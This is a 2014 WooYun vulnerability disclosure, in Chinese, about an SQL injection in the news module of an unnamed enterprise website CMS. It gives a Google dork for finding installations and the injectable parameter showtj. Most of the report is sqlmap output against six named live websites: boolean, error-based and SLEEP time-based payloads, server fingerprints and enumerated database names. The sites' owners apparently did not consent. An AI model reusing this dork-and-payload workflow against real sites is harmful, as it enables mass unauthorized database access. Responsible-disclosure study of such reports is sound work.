当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-063727

漏洞标题:某企业建站系统新闻一处无限制通杀型sql注入#4

相关厂商:某企业建站系统

漏洞作者: Mosuan

提交时间:2014-06-06 12:20

修复时间:2014-09-04 12:22

公开时间:2014-09-04 12:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-06: 细节已通知厂商并且等待厂商处理中
2014-06-11: 厂商已经确认,细节仅向厂商公开
2014-06-14: 细节向第三方安全合作伙伴开放
2014-08-05: 细节向核心白帽子及相关领域专家公开
2014-08-15: 细节向普通白帽子公开
2014-08-25: 细节向实习白帽子公开
2014-09-04: 细节向公众公开

简要描述:

我又来了....

详细说明:

那么晚了,该睡觉了,呵呵。前面的漏洞麻烦审核下,谢谢。
百度关键词

关于我们| 联系方式| 客户留言| 人才招聘| 相关知识| 友情链接 版权所有


搜索
google关键词

inurl:news/class/index.php?page=1


搜索出来的结果去掉路径,然后加上

news/class/index.php?showtj=1


例如

http://www.hope-med.com.cn//news/class/index.php?showtj=1


随机选几个网站进行注入吧。

注入地址:http://www.hope-med.com.cn//news/class/index.php?showtj=1
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 01:52:29
[01:52:29] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\www.hope-med.com.cn\session' as session file
[01:52:29] [INFO] testing connection to the target url
[01:52:30] [INFO] testing if the url is stable, wait a few seconds
[01:52:33] [INFO] url is stable
[01:52:33] [INFO] testing if GET parameter 'showtj' is dynamic
[01:52:33] [INFO] confirming that GET parameter 'showtj' is dynamic
[01:52:34] [INFO] GET parameter 'showtj' is dynamic
[01:52:34] [INFO] heuristic test shows that GET parameter 'showtj' might be inje
ctable (possible DBMS: MySQL)
[01:52:34] [INFO] testing sql injection on GET parameter 'showtj'
[01:52:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:52:38] [INFO] GET parameter 'showtj' is 'AND boolean-based blind - WHERE or
HAVING clause' injectable
[01:52:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[01:52:38] [INFO] GET parameter 'showtj' is 'MySQL >= 5.0 AND error-based - WHER
E or HAVING clause' injectable
[01:52:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:52:38] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:53:30] [CRITICAL] the target url responded with an unknown HTTP status code,
try to force the HTTP User-Agent header with option '--user-agent' or switch '-
-random-agent', sqlmap is going to retry the request
[01:53:30] [WARNING] most probably web server instance hasn't recovered yet from
previous timed based payload. If the problem persists please wait for few minut
es and rerun without flag T in option '--technique' (e.g. --flush-session --tech
nique=BEUS) or try to lower the value of option '--time-sec' (e.g. --time-sec=2)
[01:54:01] [INFO] GET parameter 'showtj' is 'MySQL > 5.0.11 AND time-based blind
' injectable
[01:54:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:54:02] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for UNION query injection technique
[01:54:06] [INFO] target url appears to have 1 columns in query
[01:54:08] [WARNING] if UNION based SQL injection is not detected, please consid
er usage of option '--union-char' (e.g. --union-char=1) and/or try to force the
back-end DBMS (e.g. --dbms=mysql)
[01:54:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'showtj' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] y
sqlmap identified the following injection points with a total of 26 HTTP(s) requ
ests:
---
Place: GET
Parameter: showtj
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: showtj=1' AND 5505=5505 AND 'IciK'='IciK
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: showtj=1' AND (SELECT 6671 FROM(SELECT COUNT(*),CONCAT(0x3a7267763a
,(SELECT (CASE WHEN (6671=6671) THEN 1 ELSE 0 END)),0x3a6a6a763a,FLOOR(RAND(0)*2
))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Hobm'='Hobm
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: showtj=1' AND SLEEP(5) AND 'COiB'='COiB
---
[01:55:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: PHP 5.2.10, Apache 2.2.3
back-end DBMS: MySQL 5.0
[01:55:22] [INFO] fetching database names
[01:55:22] [INFO] the SQL query used returns 2 entries
[01:55:23] [INFO] retrieved: information_schema
[01:55:23] [INFO] retrieved: hope
available databases [2]:
[*] hope
[*] information_schema
[01:55:23] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\www.hope-med.com.cn'


注入地址:http://www.sjzqiman.com//news/class/index.php?showtj=1
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 02:02:02
[02:02:03] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\www.sjzqiman.com\session' as session file
[02:02:03] [INFO] testing connection to the target url
[02:02:04] [INFO] testing if the url is stable, wait a few seconds
[02:02:06] [INFO] url is stable
[02:02:06] [INFO] testing if GET parameter 'showtj' is dynamic
[02:02:06] [WARNING] GET parameter 'showtj' appears to be not dynamic
[02:02:07] [INFO] heuristic test shows that GET parameter 'showtj' might be inje
ctable (possible DBMS: MySQL)
[02:02:07] [INFO] testing sql injection on GET parameter 'showtj'
[02:02:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:02:15] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[02:02:17] [INFO] GET parameter 'showtj' is 'MySQL >= 5.0 AND error-based - WHER
E or HAVING clause' injectable
[02:02:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[02:02:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[02:02:18] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[02:02:19] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for UNION query injection technique
[02:02:22] [INFO] target url appears to have 1 columns in query
[02:02:23] [WARNING] if UNION based SQL injection is not detected, please consid
er usage of option '--union-char' (e.g. --union-char=1) and/or try to force the
back-end DBMS (e.g. --dbms=mysql)
[02:02:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'showtj' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] y
sqlmap identified the following injection points with a total of 28 HTTP(s) requ
ests:
---
Place: GET
Parameter: showtj
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: showtj=1' AND (SELECT 3073 FROM(SELECT COUNT(*),CONCAT(0x3a6e6a733a
,(SELECT (CASE WHEN (3073=3073) THEN 1 ELSE 0 END)),0x3a6871713a,FLOOR(RAND(0)*2
))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'CBTZ'='CBTZ
---
[02:02:27] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: PHP 5.2.6, ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[02:02:27] [INFO] fetching database names
[02:02:28] [INFO] the SQL query used returns 2 entries
[02:02:28] [INFO] retrieved: information_schema
[02:02:29] [INFO] retrieved: sq_sjzqiman
available databases [2]:
[*] information_schema
[*] sq_sjzqiman
[02:02:29] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\www.sjzqiman.com'


注入地址:cdrcgt.com//news/class/index.php?showtj=1
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 02:05:00
[02:05:01] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\cdrcgt.com\session' as session file
[02:05:01] [INFO] testing connection to the target url
[02:05:01] [INFO] testing if the url is stable, wait a few seconds
[02:05:02] [INFO] url is stable
[02:05:02] [INFO] testing if GET parameter 'showtj' is dynamic
[02:05:02] [WARNING] GET parameter 'showtj' appears to be not dynamic
[02:05:03] [INFO] heuristic test shows that GET parameter 'showtj' might be inje
ctable (possible DBMS: MySQL)
[02:05:03] [INFO] testing sql injection on GET parameter 'showtj'
[02:05:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:05:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[02:05:07] [INFO] GET parameter 'showtj' is 'MySQL >= 5.0 AND error-based - WHER
E or HAVING clause' injectable
[02:05:07] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[02:05:07] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[02:05:07] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[02:05:08] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for UNION query injection technique
[02:05:09] [INFO] target url appears to have 1 columns in query
[02:05:09] [WARNING] if UNION based SQL injection is not detected, please consid
er usage of option '--union-char' (e.g. --union-char=1) and/or try to force the
back-end DBMS (e.g. --dbms=mysql)
[02:05:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'showtj' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] y
sqlmap identified the following injection points with a total of 28 HTTP(s) requ
ests:
---
Place: GET
Parameter: showtj
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: showtj=1' AND (SELECT 7887 FROM(SELECT COUNT(*),CONCAT(0x3a70736d3a
,(SELECT (CASE WHEN (7887=7887) THEN 1 ELSE 0 END)),0x3a6961643a,FLOOR(RAND(0)*2
))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'njTH'='njTH
---
[02:05:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
[02:05:27] [INFO] fetching database names
[02:05:27] [INFO] the SQL query used returns 3 entries
[02:05:27] [INFO] retrieved: information_schema
[02:05:28] [INFO] retrieved: cdrcgtdb
[02:05:28] [INFO] retrieved: test
available databases [3]:
[*] cdrcgtdb
[*] information_schema
[*] test
[02:05:28] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\cdrcgt.com'
[*] shutting down at 02:05:28


注入地址:www.sayesfilter.com//news/class/index.php?showtj=1
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 02:05:24
[02:05:24] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\www.sayesfilter.com\session' as session file
[02:05:24] [INFO] testing connection to the target url
[02:05:28] [INFO] testing if the url is stable, wait a few seconds
[02:05:30] [INFO] url is stable
[02:05:30] [INFO] testing if GET parameter 'showtj' is dynamic
[02:05:30] [WARNING] GET parameter 'showtj' appears to be not dynamic
[02:05:31] [INFO] heuristic test shows that GET parameter 'showtj' might be inje
ctable (possible DBMS: MySQL)
[02:05:31] [INFO] testing sql injection on GET parameter 'showtj'
[02:05:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:05:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[02:05:39] [INFO] GET parameter 'showtj' is 'MySQL >= 5.0 AND error-based - WHER
E or HAVING clause' injectable
[02:05:39] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[02:05:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[02:05:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[02:05:41] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for UNION query injection technique
[02:05:44] [INFO] target url appears to have 1 columns in query
[02:05:45] [WARNING] if UNION based SQL injection is not detected, please consid
er usage of option '--union-char' (e.g. --union-char=1) and/or try to force the
back-end DBMS (e.g. --dbms=mysql)
[02:05:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'showtj' is vulnerable. Do you want to keep testing the others (if
any)? [y/N]
sqlmap identified the following injection points with a total of 28 HTTP(s) requ
ests:
---
Place: GET
Parameter: showtj
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: showtj=1' AND (SELECT 7627 FROM(SELECT COUNT(*),CONCAT(0x3a6f6e6c3a
,(SELECT (CASE WHEN (7627=7627) THEN 1 ELSE 0 END)),0x3a6765723a,FLOOR(RAND(0)*2
))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'BrYM'='BrYM
---
[02:05:46] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0
[02:05:46] [INFO] fetching database names
[02:05:46] [INFO] the SQL query used returns 2 entries
[02:05:47] [INFO] retrieved: information_schema
[02:05:47] [INFO] retrieved: sayesfilter
available databases [2]:
[*] information_schema
[*] sayesfilter
[02:05:47] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\www.sayesfilter.com'
[*] shutting down at 02:05:47


注入地址:http://www.fhzkgz.com//news/class/index.php?showtj=1
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 02:06:03
[02:06:03] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\www.fhzkgz.com\session' as session file
[02:06:03] [INFO] testing connection to the target url
[02:06:04] [INFO] testing if the url is stable, wait a few seconds
[02:06:06] [INFO] url is stable
[02:06:06] [INFO] testing if GET parameter 'showtj' is dynamic
[02:06:07] [WARNING] GET parameter 'showtj' appears to be not dynamic
[02:06:09] [WARNING] heuristic test shows that GET parameter 'showtj' might not
be injectable
[02:06:09] [INFO] testing sql injection on GET parameter 'showtj'
[02:06:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:06:32] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[02:06:38] [INFO] GET parameter 'showtj' is 'MySQL >= 5.0 AND error-based - WHER
E or HAVING clause' injectable
[02:06:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[02:06:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[02:06:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[02:06:42] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for UNION query injection technique
[02:06:47] [INFO] target url appears to have 1 columns in query
[02:06:49] [WARNING] if UNION based SQL injection is not detected, please consid
er usage of option '--union-char' (e.g. --union-char=1) and/or try to force the
back-end DBMS (e.g. --dbms=mysql)
[02:06:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'showtj' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] y
sqlmap identified the following injection points with a total of 28 HTTP(s) requ
ests:
---
Place: GET
Parameter: showtj
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: showtj=1' AND (SELECT 6952 FROM(SELECT COUNT(*),CONCAT(0x3a6370793a
,(SELECT (CASE WHEN (6952=6952) THEN 1 ELSE 0 END)),0x3a7375723a,FLOOR(RAND(0)*2
))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Bnvg'='Bnvg
---
[02:06:52] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0
[02:06:52] [INFO] fetching database names
[02:06:53] [INFO] the SQL query used returns 2 entries
[02:06:54] [INFO] retrieved: information_schema
[02:06:55] [INFO] retrieved: fhzkgz
available databases [2]:
[*] fhzkgz
[*] information_schema
[02:06:55] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\www.fhzkgz.com'


注入地址:www.atosn.com/news/class/index.php?showtj=1
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 02:06:51
[02:06:51] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\www.atosn.com\session' as session file
[02:06:51] [INFO] testing connection to the target url
[02:06:52] [INFO] testing if the url is stable, wait a few seconds
[02:06:54] [INFO] url is stable
[02:06:54] [INFO] testing if GET parameter 'showtj' is dynamic
[02:06:54] [INFO] confirming that GET parameter 'showtj' is dynamic
[02:06:55] [INFO] GET parameter 'showtj' is dynamic
[02:06:56] [INFO] heuristic test shows that GET parameter 'showtj' might be inje
ctable (possible DBMS: MySQL)
[02:06:56] [INFO] testing sql injection on GET parameter 'showtj'
[02:06:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:07:11] [INFO] GET parameter 'showtj' is 'AND boolean-based blind - WHERE or
HAVING clause' injectable
[02:07:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[02:07:12] [INFO] GET parameter 'showtj' is 'MySQL >= 5.0 AND error-based - WHER
E or HAVING clause' injectable
[02:07:12] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[02:07:13] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[02:08:13] [INFO] GET parameter 'showtj' is 'MySQL > 5.0.11 AND time-based blind
' injectable
[02:08:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[02:08:18] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for UNION query injection technique
[02:08:21] [INFO] target url appears to have 1 columns in query
[02:08:23] [WARNING] if UNION based SQL injection is not detected, please consid
er usage of option '--union-char' (e.g. --union-char=1) and/or try to force the
back-end DBMS (e.g. --dbms=mysql)
[02:08:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'showtj' is vulnerable. Do you want to keep testing the others (if
any)? [y/N]
sqlmap identified the following injection points with a total of 26 HTTP(s) requ
ests:
---
Place: GET
Parameter: showtj
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: showtj=1' AND 6783=6783 AND 'Nuqn'='Nuqn
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: showtj=1' AND (SELECT 8683 FROM(SELECT COUNT(*),CONCAT(0x3a7869733a
,(SELECT (CASE WHEN (8683=8683) THEN 1 ELSE 0 END)),0x3a646b7a3a,FLOOR(RAND(0)*2
))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'dLok'='dLok
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: showtj=1' AND SLEEP(5) AND 'hEbD'='hEbD
---
[02:08:25] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5.0
[02:08:25] [INFO] fetching database names
[02:08:27] [INFO] the SQL query used returns 2 entries
[02:08:28] [INFO] retrieved: information_schema
[02:08:30] [INFO] retrieved: atosn
available databases [2]:
[*] atosn
[*] information_schema
[02:08:30] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\www.atosn.com'

漏洞证明:

详细说明

修复方案:

你们懂的!

版权声明:转载请注明来源 Mosuan@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-06-11 10:00

厂商回复:

与wooyun-2014-一并处置,不再单独评分。

最新状态:

暂无